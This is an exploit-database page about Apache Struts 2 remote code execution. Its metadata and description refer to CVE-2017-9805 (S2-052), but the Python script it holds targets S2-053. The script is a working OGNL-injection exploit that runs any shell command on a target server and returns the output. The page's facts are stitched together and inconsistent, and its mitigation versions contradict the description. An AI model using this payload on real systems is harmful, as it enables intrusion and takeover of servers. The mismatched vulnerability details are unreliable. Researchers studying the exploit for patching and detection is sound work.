header-logo
Suggest Exploit
vendor:
Struts
by:
Anonymous
8,1
CVSS
HIGH
Struts2 Remote Code Execution Vulnerability
94
CWE
Product Name: Struts
Affected Version From: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
Affected Version To: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
Patch Exists: YES
Related CWE: CVE-2017-9805
CPE: 2.3:a:apache:struts:2.3.5
Metasploit: https://www.rapid7.com/db/vulnerabilities/struts-cve-2017-9805/https://www.rapid7.com/db/vulnerabilities/apachestruts2-s2-052/
Other Scripts: N/A
Tags: cve,cve2017,apache,rce,struts,kev
CVSS Metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.htmlhttps://struts.apache.org/docs/s2-052.htmlhttps://nvd.nist.gov/vuln/detail/CVE-2017-9805http://www.securitytracker.com/id/1039263https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax
Nuclei Metadata: {'max-request': 2, 'vendor': 'apache', 'product': 'struts'}
Platforms Tested: Windows, Linux, Mac
2017

S2-053 Exploit

The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.

Mitigation:

Upgrade to Struts 2.3.32 or Struts 2.5.10.1
Source

Exploit-DB raw data:

import requests
import sys
from urllib import quote

def exploit(url):
    res = requests.get(url, timeout=10)
    if res.status_code == 200:
        print "[+] Response: {}".format(str(res.text))
        print "\n[+] Exploit Finished!"
    else:
        print "\n[!] Exploit Failed!"

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print """****S2-053 Exploit****
Usage:
    exploit.py <url> <param> <command>

Example:
    exploit.py "http://127.0.0.1/" "name" "uname -a"
        """
        exit()
    url = sys.argv[1]
    param = sys.argv[2]
    command = sys.argv[3]
    #payload = "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"""
    # Can show the echo message
    payload = "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}"
    link = "{}/?{}={}".format(url, param, quote(payload))
    print "[*] Generated EXP: {}".format(link)
    print "\n[*] Exploiting..."
    exploit(link)

Navigation

Suggest Exploit

Services By CQR